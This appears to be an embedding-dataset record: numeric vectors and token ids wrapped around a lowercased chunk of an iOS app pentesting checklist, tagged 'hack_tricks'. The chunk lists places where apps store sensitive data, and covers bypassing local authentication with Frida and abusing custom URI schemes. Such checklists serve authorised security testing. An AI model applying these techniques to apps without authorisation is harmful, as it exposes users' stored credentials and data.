-0.7423962354660034, 0.31421005725860596, 0.1413784623146057, 0.5482059121131897, -0.8706232309341431, -0.09533023834228516, 0.4142756164073944, -1.12112295627594, 0.28282374143600464, 0.2846091389656067, -0.9974569082260132, 0.07533466815948486, 0.2683255672454834, -0.7080745100975037, 0.7139171361923218, 0.8888832926750183, -0.6719647645950317, -0.06489507108926773, 0.6543486714363098, -0.2373470962047577, -0.7303776144981384, -0.7250291705131531, 0.725469172000885, -0.7591448426246643, -0.22635291516780853, 0.8830044269561768, 0.15765364468097687, 1.0246613025665283, -0.5036026239395142, 1.4637714624404907, 0.4927484095096588, 0.6531872749328613, -0.49820587038993835, -0.060369931161403656, -0.5298600196838379, -0.3802753686904907, -0.5666776895523071, -0.2988134026527405, -0.005561631638556719, 0.09573256969451904, -0.011805890128016472, 1.4402720928192139, 0.4219759404659271, -0.1814020276069641, 0.7471964955329895, -0.162806898355484, 0.21111798286437988, 0.4062801003456116, -0.7682257890701294, 1.4878630638122559, -0.6338655352592468, 0.35986965894699097, 0.2508009374141693, -0.497153103351593, -0.3110015094280243, -0.13634192943572998, -0.23555733263492584, 0.9207363724708557, -0.7583415508270264, 0.8024975657463074, 0.07767366617918015, 0.8184599876403809, -0.605739414691925, -0.5228873491287231, 0.07056495547294617, -0.046252042055130005, -0.9583195447921753, 0.16713431477546692, 0.20949794352054596, -0.13297387957572937, -0.7004856467247009, -0.00501298438757658, 0.620367705821991, 0.8239141702651978, 0.4049012362957001, 0.3522225022315979, -0.12050540000200272, 0.018979158252477646, -0.5085479617118835, -0.5571292042732239, -0.24945147335529327, -0.09824402630329132, -1.2301957607269287, 0.6522643566131592, 0.6508815884590149, -0.4497004449367523, 0.2702677249908447, -0.5470391511917114, 0.26941168308258057, -0.12484266608953476, 0.03252753987908363, 0.2862757444381714, 0.47971847653388977, 0.804262101650238, -0.5283210873603821, 0.5417025089263916, 0.40608152747154236, 0.34889426827430725, -1.2552818059921265, -0.054195206612348557, -0.06510747969150543, 0.04094769433140755, 0.4075981676578522, -0.5788335204124451, -1.0767556428909302, -0.09662830829620361, 0.0074291592463850975, 0.021886197850108147, -0.2418997436761856, -0.4167456030845642, -0.018534256145358086, 0.014780576340854168, -0.3347281515598297, 0.04092298448085785, 0.5950672626495361, -0.25995486974716187, 1.0224928855895996, 0.4776197075843811, -0.6376521587371826, 0.6877496242523193, -0.07819733023643494, 0.34517014026641846, -0.7686639428138733, 0.77980637550354, 0.852364718914032, 0.10267693549394608, -0.5973654389381409, -0.5718905329704285, -0.12596917152404785, -0.4315544366836548, -0.4443206489086151, -0.25113990902900696, -0.5781015157699585, 0.6071054339408875, -0.3793869912624359, -1.504922866821289, -0.10879604518413544, -0.4058099389076233, -0.1033005341887474, -0.6423958539962769, -0.8250571489334106, 0.30917131900787354, 0.4014776349067688, -0.3312040865421295, -0.4469229280948639, 0.19833916425704956, -0.6053612232208252, -0.1543688327074051, 0.6123026609420776, -0.8824662566184998, 0.4495708644390106, 0.137705996632576, 0.0026626288890838623, 0.9750833511352539, 0.3035985231399536, 0.011208330281078815, 0.6113086938858032, -0.3760845959186554, -0.4900933504104614, 0.20065632462501526, 0.30514901876449585, 0.4722135365009308, 0.5207435488700867, 0.2582571506500244, -0.36657094955444336, 0.3726252019405365, 0.5436089634895325, -0.5416063666343689, 0.10428546369075775, 0.5118938088417053, 0.6472897529602051, -0.9044159650802612, 0.1902565360069275, -0.9006448984146118, -0.8160207867622375, 0.6830394268035889, 1.4872651100158691, -0.13814407587051392, -0.001491325325332582, -0.29318416118621826, -0.5107851028442383, 0.1348673552274704, -0.22486470639705658, 0.07195323705673218, 1.1956076622009277, -0.8443732261657715, 0.6681671738624573, -0.1356702744960785, -0.40150943398475647, 0.6430286169052124, -0.21584393084049225, 0.6118382215499878, 0.6766789555549622, 0.2628623843193054, -0.5174198150634766, -0.045486025512218475, -0.7474644184112549, 0.0959373265504837, -0.9268911480903625, -0.4048115611076355, 0.02128221094608307, -0.26537251472473145, -0.9479427933692932, -1.0118194818496704, 0.09892446547746658, 0.702684223651886, 0.5186423659324646, 0.3354203402996063, 0.97926265001297, 0.10049321502447128, 1.0932656526565552, 0.5898083448410034, 0.11371780186891556, -0.4532185196876526, -0.9548467993736267, 0.07481291145086288, -0.1842714548110962, -0.804578423500061, -0.38268232345581055, -0.5531215071678162, -1.112521767616272, 0.28943729400634766, -0.4405613839626312, 0.4951629042625427, -0.16788789629936218, 0.09243159741163254, 0.46833884716033936, 0.2565627694129944, -0.3638319969177246, -0.6377297043800354, -0.21990686655044556, 0.13773106038570404, 0.6834621429443359, -0.5114440321922302, -0.24825629591941833, -0.971593976020813, 0.630327045917511, 1.073574185371399, -0.18912123143672943, -0.4815155863761902, -1.0677162408828735, -1.3327200412750244, -0.8504267930984497, 0.33714544773101807, 1.017842411994934, 0.44163715839385986, 0.473478227853775, -0.787026047706604, 1.9306340217590332, 0.6260409355163574, 0.38516998291015625, -0.48426878452301025, -0.46950671076774597, 0.4095063805580139, 0.4366108477115631, 0.7394875884056091, -0.3950706422328949, -0.5329349637031555, 0.3870634138584137, -0.7291979193687439, 0.6791396737098694, 0.06652243435382843, -0.8113688826560974, -0.9019438624382019, 1.015902042388916, 0.3844493627548218, 0.20128114521503448, -0.28480151295661926, 0.026729488745331764, -0.1667712777853012, 0.20651879906654358, -0.3480600118637085, -0.5439357161521912, 0.5930728316307068, -0.4934443533420563, -0.3762935400009155, 0.7714354395866394, 0.5159367918968201, -0.5540350079536438, 0.49929535388946533, -0.07068902254104614, -0.4628120958805084, 0.6044052243232727, -0.2747741937637329, 0.27864891290664673, 0.12254903465509415, -0.8904978632926941, 0.07244478911161423, -0.817571222782135, 0.6587842702865601, 0.4967058002948761, -0.5430992245674133, -0.1443900763988495, -0.8238058686256409, -0.09461066126823425, 0.04815027862787247, -0.8899006247520447, 1.107237458229065, -0.2015276551246643, -0.14459361135959625, 0.6204990148544312, -0.26786619424819946, 0.14823254942893982, 0.15225403010845184, -0.22280114889144897, -0.48471689224243164, 1.2016628980636597, 0.28706249594688416, -0.10500938445329666, 0.009806488640606403, -1.1573587656021118, 0.0675065889954567, 0.04008345305919647, 0.1611427515745163, -1.1035887002944946, 0.005090474151074886, 0.568397581577301, -0.014888246543705463, -1.0596561431884766, 0.5138723254203796, -0.7583933472633362, -0.16643747687339783, -0.21115794777870178, 0.03490794450044632, 0.8714207410812378, -0.5719801187515259, -0.6338859796524048, 0.572175145149231, 0.677828311920166, -0.6218069791793823, -0.6861828565597534, 0.09895163774490356, 0.20628675818443298, 0.4255425035953522, -0.2510860562324524, -0.2784534990787506, -0.6179630756378174, -0.33197924494743347, 0.7484772801399231, -0.8589537739753723, -0.07938569784164429, -0.7115887999534607, -0.5013147592544556, -0.7582042217254639, 0.7497135996818542, 0.7734941840171814, -0.8806111812591553, 0.12784144282341003, -0.8751410841941833, 0.13460257649421692, -0.03962453827261925, -0.08351747691631317, -0.2934924364089966, 0.3843599259853363, -0.2780034840106964, 1.62997567653656, -0.021782463416457176, 0.7980148196220398, 0.4464395344257355, 0.7119603157043457, 0.260531485080719, 0.947354793548584, -0.8800373673439026, -0.13929447531700134, -0.2158234864473343, -0.1403161883354187, -0.010548243299126625, 0.48755019903182983, -1.4787365198135376, 0.31356289982795715, -1.01442289352417, -0.017175287008285522, -0.34563013911247253, 0.45503321290016174, -0.29305773973464966, 0.5083174109458923, -0.03991109877824783, -0.1497039496898651, 1.0633996725082397, 0.10774485766887665, -0.2554224729537964, 0.5021481513977051, 0.17121000587940216, -0.4704943895339966, -0.21779197454452515, -0.7438217997550964, -0.8936291337013245, 0.3816414773464203, -0.8155958652496338, -0.22190965712070465, -0.6523160934448242, -1.0060954093933105, 0.005608491599559784, 0.10760693997144699, -0.09290865808725357, 1.4090595245361328, 0.25013235211372375, 0.10774977505207062, -0.23819464445114136, 0.5138628482818604, 0.43139883875846863, -0.6973270773887634, -0.6660678386688232, 0.1428309679031372, 0.1334954798221588, 0.020367039367556572, -1.0082857608795166, 0.3278864920139313, -1.186209797859192, -0.36061570048332214, 0.08805644512176514, -0.3211558163166046, 0.6418122053146362, 0.10351221263408661, -1.4484363794326782, -0.7199296355247498, 0.8403164744377136, 0.3465127944946289, 0.38332438468933105, 0.7699979543685913, 0.8937475085258484, -0.4601914882659912, 0.5848142504692078, -1.050173282623291, 0.6679198145866394, -0.4071369171142578, 1.0299707651138306, -0.4798373579978943, -0.18735983967781067, 0.36775222420692444, 1.2367911338806152, -0.935866117477417, -1.524102807044983, -0.23964208364486694, -0.2708442211151123, 0.2767745554447174, -0.850996196269989, -0.014377045445144176, -0.5913617610931396, -0.44030705094337463, 0.045397210866212845, 0.6870102286338806, 0.12312261760234833, 0.8591431975364685, -0.02282038889825344, 0.9521582126617432, -0.5869021415710449, 0.13418114185333252, 1.2152459621429443, 0.17132653295993805, -0.5321439504623413, -1.2107198238372803, 0.3580852746963501, -0.5484527349472046, 0.0010022225324064493, 0.7656120657920837, -0.4862633943557739, 0.09686171263456345, 0.7586104869842529, 0.8597026467323303, 1.0288686752319336, 0.03496478125452995, 0.2740505635738373, 0.4327821135520935, -0.5765424370765686, -1.1508914232254028, -0.727494478225708, -0.2954169809818268, -0.6203159689903259, 0.9031429290771484, -0.6960333585739136, 0.015798376873135567, -0.9470205307006836, 0.8875706791877747, -0.014265967532992363, -0.42550981044769287, -0.4824105501174927, -1.297402024269104, -0.40331920981407166, -0.413996160030365, -0.08482567965984344, 0.1416083425283432, 0.5041776299476624, -1.0013967752456665, -0.39021164178848267, 0.13267181813716888, 0.6590995788574219, -0.3406476080417633, 0.0037329925689846277, -0.8651224374771118, -0.13587282598018646, -0.7166582345962524, -0.8315470814704895, -1.2501221895217896, -0.48913267254829407, 0.5071803331375122, -0.4433096945285797, 0.011392858810722828, 0.33527761697769165, -0.4759727120399475, 0.40858757495880127, -0.10957509279251099, -0.07870478928089142, -0.10055025666952133, -0.5301192998886108, 0.029201796278357506, 0.13673950731754303, -0.7248857617378235, -0.4418357312679291, 0.34602105617523193, -0.6658583879470825, 0.26040542125701904, -0.20428797602653503, -0.19701054692268372, -0.24346113204956055, 0.24481332302093506, 0.20641690492630005, -0.015844330191612244, -0.3780174255371094, -0.8397316336631775, 0.26973795890808105, -0.2732087969779968, 0.45213544368743896, -0.9433775544166565, -0.3965456485748291, 0.057205673307180405, 0.3398641347885132, 0.1596613973379135, 0.10974361002445221, -0.3168145418167114, 0.18683558702468872, 0.1133638471364975, 0.4333096146583557, 0.0903123989701271, 0.5632853507995605, 0.8527703285217285, 0.27216702699661255, 0.3844155967235565, -0.06941567361354828, 0.11643246561288834, 0.11890550702810287, 0.2775987982749939, 0.771491289138794, -0.3445383906364441, -0.4620259702205658, -0.30835115909576416, -0.5020847320556641, -0.318647563457489, 0.32896411418914795, -0.5484073162078857, 0.4737713038921356, 0.6262409090995789, -0.1289832442998886, 0.042891353368759155, -0.14342688024044037, -1.8822262287139893, -0.7238916158676147, 0.01428007148206234, 0.03713701665401459, 0.49789518117904663, -0.24540182948112488, -0.17633262276649475, 0.32104232907295227, -0.17403778433799744, -0.22356311976909637, 0.2966451048851013, 0.14010535180568695, 0.8005331158638, 1.0384390354156494, -0.8018735647201538, 0.6560468673706055, 0.4120682179927826, 0.32100918889045715, -0.6633610129356384, -0.38537707924842834, -0.07931731641292572, 1.5498253107070923, 0.32041823863983154, -0.12894561886787415, -0.07946321368217468, 0.03306093066930771, -0.12111134827136993, -0.16664400696754456, 0.18161356449127197, 0.4771074950695038, -0.8873940110206604, 0.9846421480178833, -0.6368135809898376, 0.9091249108314514, -0.06805362552404404, 0.19281530380249023, 0.010675120167434216, 0.5367996096611023, -1.011804223060608, 0.7193846106529236, 0.36007577180862427, 0.2643619477748871, 0.5948962569236755, -0.05844572186470032, 0.4226174056529999, -0.8134254217147827, 0.07743726670742035, 0.1281023770570755, 0.8536689877510071, 0.24336650967597961, 0.336612343788147, -0.890613853931427, 1.0322335958480835, 0.26343005895614624, -0.4428173899650574, -0.16898858547210693, 0.6405877470970154, -0.6433464884757996, -1.2643141746520996, -0.0015357313677668571, -0.21796254813671112, -0.657242476940155, 0.6372610330581665, -0.5525445342063904, 0.31362423300743103, -0.39126792550086975, 0.1609007716178894, -0.09200604259967804, -0.40383270382881165, 0.36227381229400635, -1.1295427083969116, 0.3270202577114105, -0.11318537592887878, 0.04042845219373703, 1.3146908283233643, 0.41829752922058105, -0.45920875668525696, 0.2222902625799179, 0.4169677793979645, 0.6089221239089966, -0.4748584032058716, 0.5890229940414429, -0.4383237063884735, 0.4396955370903015, -0.43259233236312866, 0.4367211163043976, -1.0470463037490845, 0.1322930008172989, 0.33550578355789185, 0.3998982310295105, -0.5677744150161743, 0.7527645230293274, 0.3584015667438507, 0.014482399448752403, 0.6990363001823425, -0.4653874933719635, 0.1222892627120018, -0.3491418659687042, -0.28697651624679565, -0.8204464316368103, -0.3473745584487915, 1.062808871269226, -0.3275948464870453, -0.7525944709777832, 0.0036479798145592213, -0.5785503387451172, 0.44953903555870056, 0.7264567613601685, 0.915153443813324, -0.9483393430709839, 0.54733806848526, 0.7501705884933472, -0.15879584848880768, 0.07135966420173645, -0.29171767830848694, -0.7513659596443176, -0.2620110809803009, -0.7040882110595703, 0.1013701856136322, 0.15937216579914093, -0.7766960263252258, -1.3398551940917969, -0.09229979664087296, 0.34094148874282837, -0.2780493199825287, -0.5204581618309021, -0.08123957365751266, 0.42317983508110046, -0.8975331783294678, -0.22709183394908905, 1.291171908378601, -0.16010822355747223, -0.1240168884396553, -0.4363787770271301, -0.36142727732658386, -0.2554161548614502, -0.11644837260246277, -1.029011607170105, 0.6195005178451538, -0.5122830271720886, -1.2368996143341064, -0.20294582843780518, -0.7737172245979309, -0.542618453502655, 0.26110345125198364, -0.002185109304264188, 0.02846066653728485, 0.14694413542747498, 0.7588223814964294, 0.5039267539978027, 0.698689341545105, -0.41134321689605713, 0.03929709643125534, 0.23446805775165558, 1.4752651453018188, -0.7419668436050415, 0.6823279857635498, -0.6557369828224182, -0.1222098246216774, 0.6865218877792358, -0.6190457940101624, 0.6581780910491943, -0.5683785676956177, -0.32539039850234985, -0.04371686652302742, -0.0626288503408432, -0.7055124640464783, -0.6059249639511108, 0.4900246858596802, 0.5641242265701294, -0.1455758661031723, -0.36518341302871704, -1.0919688940048218, -0.3543229401111603, -0.8076268434524536, 0.34740781784057617, -0.403703510761261, -0.550133228302002, 0.24453556537628174, -0.9491206407546997, 0.6638108491897583, -2.0932679176330566, 3.3891499042510986, 0.7174115777015686, 0.28648942708969116, 0.5603936910629272, 0.9165981411933899, 0.28298699855804443, 0.4505140483379364, -0.9915734529495239, 0.2042531818151474, -0.5278173685073853, 0.33412933349609375, 0.2951605021953583, 0.3949785828590393, 1.0042115449905396, -0.36487242579460144, 0.9997463226318359, -0.8919500112533569, 0.48954862356185913, 0.4373117685317993, -0.5171972513198853, -0.5830381512641907, 0.06564265489578247, 0.6566102504730225, 0.2467576116323471, 0.4455149471759796, 0.45693138241767883, 0.44769272208213806, -0.38552501797676086, -0.7070672512054443, -0.48770672082901, 0.5003147721290588, -0.47012773156166077, 0.772106409072876, 0.17584443092346191, -0.5836955308914185, 0.5583359003067017, -0.09761987626552582, -0.6255645155906677, 0.5757434964179993, -0.22711224853992462, -0.3776955008506775, -0.5676842927932739, -0.2148132026195526, -0.4645669460296631, 0.16181007027626038, -0.3625033497810364, 0.022460395470261574, -0.40608176589012146, 1.3445484638214111, -0.4015355110168457, -0.3031201958656311, 0.12563852965831757, 0.32873138785362244, -0.8346981406211853, 0.18934516608715057, -0.7491982579231262, 0.4265875518321991, -0.01501365564763546, 0.8206892609596252, 0.062138959765434265, 0.21347305178642273, -0.11643410474061966, -0.5575012564659119, -0.0004868864780291915, -0.3488878607749939, 0.21994735300540924, 0.5005417466163635, 0.2793101370334625, -0.1720905601978302, -1.2617729902267456, -0.4855591654777527, -0.26574617624282837, -0.404377818107605, -0.3519526422023773, 0.04924039542675018, 1.0383763313293457, 0.5491588115692139, 0.9165788292884827, -0.4183964431285858, -0.13877348601818085, 0.35863175988197327, 0.40074244141578674, -0.14421451091766357, 0.40244075655937195, 0.43970534205436707, 0.9697598218917847, -0.5855976939201355, 0.516720712184906, 0.11056562513113022, 0.8720523715019226, 1.3692047595977783, 0.2920040488243103, -0.6123030185699463, -0.1702876091003418, 0.19220934808254242 ]
[ 1007, 1025, 1065, 24728, 19666, 10439, 23806, 6979, 2497, 1011, 15849, 29150, 2094, 1013, 1051, 3567, 2050, 1024, 15849, 29150, 2094, 8211, 11924, 10439, 23806, 6979, 2497, 102 ]
hack_tricks
419.txt
7
[CLS] ios pentesting checklist use trickest to easily build and automate workflows powered by the world's most advanced community tools. preparationread ios basicsprepare your environment reading ios testing environmentread all the sections of ios initial analysis to learn common actions to pentest an ios applicationdata storageplist files can be used to store sensitive information. core data ( sqlite database ) can store sensitive information. yapdatabases ( sqlite database ) can store sensitive information. firebase miss - configuration. realm databases can store sensitive information. couchbase lite databases can store sensitive information. binary cookies can store sensitive informationcache data can store sensitive informationautomatic snapshots can save visual sensitive informationkeychain is usually used to store sensitive information that can be left when reselling the phone. in summary, just check for sensitive information saved by the application in the filesystemkeyboardsdoes the application allow to use custom keyboards? check if sensitive information is saved in the keyboards cache fileslogscheck if sensitive information is being loggedbackupsbackups can be used to access the sensitive information saved in the file system ( check the initial point of this checklist ) also, backups can be used to modify some configurations of the application, then restore the backup on the phone, and the as the modified configuration is loaded some ( security ) functionality may be bypassedapplications memorycheck for sensitive information inside the application's memorybroken cryptographycheck if yo can find passwords used for cryptographycheck for the use of deprecated / weak algorithms to send / store sensitive datahook and monitor cryptography functionslocal authenticationif a local authentication is used in the application, you should check how the authentication is working. if it's using the local authentication framework it could be easily bypassedif it's using a function that can dynamically bypassed you could create a custom frida scriptsensitive functionality exposure through ipccustom uri handlers / deeplinks / custom schemescheck if the application is registering any protocol / schemecheck if the application is registering to use any protocol / schemecheck if the application expects to receive any kind of sensitive information from the custom scheme that can be intercepted by the another application registering the same schemecheck if the application isn't checking and sanitizing users input via the custom scheme and some vulnerability can be exploitedcheck if the application exposes any sensitive action that can be called from anywhere via the
[ 0.059175822883844376, -0.8378586769104004, -0.07841218262910843, 0.4196213483810425, -0.25458744168281555, 0.16929852962493896, 0.3482753038406372, 0.35183098912239075, 0.010570299811661243, 0.45925697684288025, 0.19763539731502533, -0.24779631197452545, -0.04789052903652191, -0.5177853107452393, -0.634432852268219, -0.5033649206161499, -0.6257175803184509, 0.33161550760269165, -0.7951830625534058, -0.14843080937862396, 0.2729252576828003, -0.035764068365097046, -1.3815702199935913, -0.5395658612251282, -0.31813591718673706, 0.877874493598938, 0.5621840953826904, -0.08747431635856628, 0.6216715574264526, 0.9160691499710083, 0.2516220510005951, 0.2766100764274597, 0.05599978193640709, 0.10158037394285202, -0.13251052796840668, -0.22965110838413239, 0.4009074568748474, -0.15913771092891693, 0.26713255047798157, -0.3338157832622528, 0.665619969367981, 0.11246275901794434, -0.0909469947218895, -0.4397221505641937, -0.38382086157798767, -0.802440345287323, 0.13205794990062714, -0.21065405011177063, 0.6817566752433777, -0.08723963797092438, 0.3702865242958069, 0.6811428666114807, -0.09783246368169785, 0.17020189762115479, 0.23122219741344452, 0.3456988036632538, 0.6131531596183777, -0.06434506177902222, -0.19174234569072723, 0.716499924659729, -0.1177777349948883, 0.006970474496483803, 0.07923468202352524, -0.7548907995223999, 0.33298033475875854, -0.35006996989250183, -0.3183963894844055, -0.8009441494941711, -0.3556753993034363, -0.4757394790649414, 0.22628197073936462, 0.13556478917598724, -0.5899621248245239, -0.41782841086387634, -0.5545313954353333, 0.09677830338478088, -0.06682814657688141, -0.4127418100833893, -0.14940086007118225, 0.28115326166152954, -0.008866246789693832, 0.4218495488166809, 0.38161584734916687, -0.08581136912107468, -0.1481540948152542, -0.010092305019497871, 0.33126595616340637, 0.4196537137031555, -0.46633225679397583, -0.032000429928302765, 0.36094093322753906, 0.244733065366745, -0.6435250043869019, 0.12143947184085846, 0.4598051607608795, 0.12001387774944305, 0.15113793313503265, -0.01652352139353752, -0.15618698298931122, 0.05326579511165619, 0.30363601446151733, 0.805001974105835, 0.43052688241004944, 1.0039937496185303, -0.565135657787323, 0.9912458062171936, -0.08031328022480011, 0.15633068978786469, -0.10296487808227539, -0.4509730935096741, -0.06982821226119995, -0.44269728660583496, 0.15410031378269196, -0.59670490026474, -0.2527000308036804, 0.6286585330963135, 0.5603349208831787, 0.4874117076396942, -0.1437201350927353, 0.5368880033493042, 0.09007890522480011, -0.4405227303504944, 0.5550733804702759, -0.13624931871891022, 0.06490941345691681, -0.41506457328796387, 0.37089231610298157, 0.0681251585483551, -0.8799655437469482, -0.5360625386238098, -0.039381179958581924, -0.6489883661270142, 0.4190056025981903, 0.5444574952125549, 0.01437674555927515, 0.05639965087175369, 0.21328949928283691, 0.5160576105117798, 0.16489459574222565, -0.6584785580635071, 0.08908127248287201, 0.7657185792922974, 0.2943631410598755, 1.1982197761535645, 0.027890698984265327, -0.32199105620384216, 0.3173772990703583, -0.39767318964004517, -0.27258771657943726, 0.30181884765625, -0.20732341706752777, -0.02222266048192978, 0.7510507702827454, 0.12928085029125214, -0.4932735562324524, 0.0491630844771862, -0.6931619048118591, 0.2868323028087616, -0.17611975967884064, 0.1884612739086151, -0.35457339882850647, 0.7002286314964294, -0.18534252047538757, 0.06746909022331238, -0.09498760104179382, 0.3911852240562439, -0.7250829339027405, -0.11459996551275253, -0.26525163650512695, -0.1630852371454239, 0.008744125254452229, 0.062222402542829514, -0.3265267014503479, 0.32151687145233154, 0.38783106207847595, 0.8987627029418945, 0.12363194674253464, 0.04373765364289284, 0.5777873992919922, 0.4777003228664398, -0.48729658126831055, 0.23411180078983307, 0.6712924838066101, 0.8971769213676453, 0.036995116621255875, 0.4882379472255707, -0.39873063564300537, -0.7837204933166504, -0.18783879280090332, -0.13659755885601044, -0.5432947874069214, 0.6435205340385437, -0.4984779953956604, 0.4097714424133301, 0.4458368420600891, -0.35961174964904785, -1.206807017326355, -0.24315804243087769, -0.125691220164299, -1.3491740226745605, -0.2694971263408661, 0.1674804389476776, -0.25989818572998047, 0.6487600207328796, -0.4024742841720581, 0.16565941274166107, 0.36193087697029114, 0.5674759745597839, -0.23897989094257355, 0.9133453369140625, 0.9157430529594421, -0.27866286039352417, -0.7303241491317749, -0.4504651129245758, -0.15686874091625214, -0.16162867844104767, -0.6825962662696838, 0.6323739886283875, 0.1421162188053131, -0.015056118369102478, -0.33410799503326416, 0.32008153200149536, 0.38543975353240967, 0.2625736892223358, 0.42445236444473267, 0.1010836511850357, 0.4356757402420044, 0.6049532294273376, -0.2362443059682846, -0.022856341674923897, -0.08259012550115585, 0.7943472862243652, 0.34771427512168884, 1.0588628053665161, 0.6303640007972717, 0.0033416575752198696, -0.16057807207107544, 0.3466155230998993, 0.3671538829803467, -0.007350222207605839, -0.013989675790071487, 0.6043263673782349, 0.584899365901947, 0.8000530004501343, 0.827219545841217, 0.4465581476688385, 0.033602528274059296, 0.08531143516302109, 0.5317901968955994, 0.38406920433044434, 0.2385016232728958, 0.6666370630264282, 0.8327662944793701, -0.1296577751636505, -0.6541685461997986, -0.708888828754425, 0.2168685495853424, 0.8099536299705505, -0.37013116478919983, -0.7797490954399109, 0.23388777673244476, 0.19246865808963776, -0.4163379669189453, -0.042254719883203506, 0.6459574103355408, 0.6383227109909058, 0.1761273443698883, 0.5210577249526978, -0.25864332914352417, -0.34818580746650696, -0.8921670317649841, -0.11532436311244965, -0.8389198184013367, -0.3762439787387848, -1.243184208869934, 0.17767010629177094, 0.87150639295578, -0.7104860544204712, 0.3300633728504181, -0.563713550567627, -0.5499275326728821, 0.2794981896877289, -0.0008747790125198662, 0.7602007985115051, -0.38267040252685547, -0.06967563927173615, -1.1636756658554077, 0.4315485954284668, -0.06817682832479477, 0.4335128366947174, -0.19172757863998413, 0.2462947517633438, 0.00552010303363204, -0.20789560675621033, -0.11875027418136597, -0.5558907389640808, 0.5998230576515198, -0.5109412670135498, -0.16212528944015503, -0.7302387356758118, 0.5252336859703064, 0.37468770146369934, 0.04188600555062294, 0.14950984716415405, -0.6378191113471985, 0.5186580419540405, -0.2567558288574219, 0.11852823942899704, 0.19255714118480682, 0.5784077048301697, -0.8825517296791077, 0.3376517593860626, -0.03404046595096588, 0.41941794753074646, -0.5072932243347168, 0.31819191575050354, 0.361213356256485, -0.005676348228007555, 0.2474776953458786, -0.3326317071914673, 0.21169918775558472, -0.43263253569602966, -0.02849799394607544, -0.11147575825452805, 0.011873818933963776, 0.13957007229328156, 0.21972417831420898, -0.9860854744911194, -0.0252557210624218, -0.15426596999168396, -0.24803507328033447, -0.2344990074634552, -0.3581683933734894, 0.534902811050415, -0.4064762592315674, 0.1659674346446991, -0.09489729255437851, -0.5200654864311218, 0.29129156470298767, 0.028531290590763092, 0.46717002987861633, -0.8443073630332947, -0.10706108808517456, 0.5208086371421814, 0.01968425326049328, 0.9048183560371399, -0.11267473548650742, -0.12182028591632843, -0.32623931765556335, -0.27621451020240784, -0.015942858532071114, 0.07296132296323776, 0.502502977848053, 0.31559157371520996, -0.5585947036743164, 0.762988805770874, -0.08205890655517578, 0.12532803416252136, 0.4142673909664154, 0.02744695357978344, 0.4528050720691681, 0.18948140740394592, -0.2898460030555725, 0.272426575422287, -0.4331878423690796, -0.6464940905570984, -0.32518574595451355, -0.21552211046218872, 0.018636535853147507, -0.3545979857444763, 0.8634965419769287, -0.5694758296012878, 0.3209516406059265, 0.5733621716499329, -0.047700829803943634, -0.3467599153518677, 0.7235210537910461, 0.25229978561401367, 0.8328343033790588, -0.4314667582511902, 0.5549929738044739, 0.3111332952976227, 0.19147951900959015, 0.02636893093585968, 0.09933256357908249, -0.32787320017814636, -0.3217896521091461, -0.43889951705932617, 0.03027920052409172, -0.8042390942573547, -0.07935760170221329, 0.06544524431228638, -0.4237057864665985, 0.2169833928346634, -0.8801279067993164, -0.8378790616989136, 0.4621337056159973, 0.4009523391723633, 0.6893782615661621, 0.25155073404312134, 0.5432978272438049, 0.44207528233528137, -0.5329203605651855, 0.2579543888568878, -0.5131525993347168, 0.24494479596614838, -0.0005462412373162806, 0.5619038343429565, -0.17308944463729858, 0.24848529696464539, -0.13353295624256134, -0.030691031366586685, -0.7218045592308044, -0.23714978992938995, -0.3432813882827759, -0.015837211161851883, -0.5547851920127869, -0.4699854254722595, -0.6206267476081848, 0.3950462341308594, -0.9476771950721741, -0.49893203377723694, -0.24641601741313934, 0.7725646495819092, 0.5766673684120178, -0.6252814531326294, 0.14313802123069763, -0.24517042934894562, 0.2125391662120819, 0.3750241994857788, 0.09424778074026108, -0.27010807394981384, -0.8826076984405518, 0.03073233924806118, -0.45616596937179565, -0.2331988662481308, 0.5095111727714539, 0.47872740030288696, 0.47299402952194214, -0.8225692510604858, 0.20276178419589996, 0.6794345378875732, -0.9785186648368835, -0.8710095286369324, -0.10958784818649292, 0.0759112685918808, 0.46223184466362, 0.34984534978866577, -0.6299954652786255, -0.05166570842266083, 0.03109566867351532, -0.8460427522659302, 0.5278213620185852, -0.684847891330719, -0.050510942935943604, -0.13106544315814972, 0.5699413418769836, 0.17856161296367645, -0.05846332758665085, -0.6438211798667908, -0.14810408651828766, -0.4693085849285126, 0.3817245364189148, -0.02197759598493576, -0.39480090141296387, 0.9210858345031738, 0.2346075028181076, -0.3818570673465729, 0.21382853388786316, 0.31123796105384827, -0.2235036939382553, 0.05288679152727127, -0.4683993458747864, -0.9657410383224487, 0.7382845878601074, -0.588752031326294, 0.3540700078010559, -0.2558335065841675, -0.11250146478414536, -0.08637958765029907, -0.2420172393321991, 0.7004543542861938, -0.16801396012306213, 0.0483994223177433, -1.1685470342636108, -0.23253105580806732, -0.29929301142692566, 0.3306451439857483, -0.31424185633659363, 1.0535757541656494, -0.49359771609306335, -0.27930355072021484, -0.10000461339950562, 0.5108237266540527, -1.1510932445526123, -0.28948524594306946, -0.48606571555137634, 0.16822244226932526, 0.0348535031080246, -0.04091526195406914, 0.47177407145500183, -0.14506813883781433, -0.7223860621452332, 0.42930129170417786, -0.34068217873573303, 0.2927652597427368, -0.9849525094032288, -0.04141736030578613, -0.5222736597061157, 0.18132354319095612, -0.5265927314758301, 0.0006389676709659398, 0.09023507684469223, -0.1564761996269226, 0.4091593027114868, 0.4659588932991028, 0.23562774062156677, -0.07987289875745773, -0.22708742320537567, 0.3186710476875305, 0.2394261509180069, 0.31360363960266113, -0.3706168532371521, 0.5366262197494507, -0.11296766251325607, -0.12075654417276382, -0.4679657220840454, -0.5648156404495239, -0.5152903199195862, -0.6633156538009644, -0.016063110902905464, -0.4128277003765106, 0.9858747720718384, -0.6137361526489258, -0.4175774157047272, -0.14860959351062775, 0.4232834577560425, 0.3855094015598297, -0.012447776272892952, -0.21285858750343323, -0.22680652141571045, -0.03317614272236824, 0.021786652505397797, -0.1632254421710968, -0.2790862023830414, -0.5735493898391724, -0.22860945761203766, 0.6661400198936462, -0.5402364134788513, 0.2821502685546875, 0.03079540655016899, -0.06519105285406113, 0.7780683636665344, 0.040981050580739975, -0.36038148403167725, -0.37649524211883545, 0.10906796902418137, -0.4594789445400238, 0.03296975791454315, 0.07862021028995514, -0.8587073683738708, 0.5254497528076172, -0.18198353052139282, -0.22104579210281372, 0.06789504736661911, -0.4981221854686737, -0.2969702184200287, -0.11333880573511124, 0.8504021167755127, -0.6114715933799744, 0.9487482309341431, -0.17915739119052887, 0.26453468203544617, 0.525455117225647, -0.25226935744285583, -0.2536190152168274, 0.3788644075393677, -0.7053894996643066, -1.2358150482177734, 0.09340223670005798, 0.016867047175765038, -0.2004355937242508, 0.5282799005508423, -0.3825323283672333, 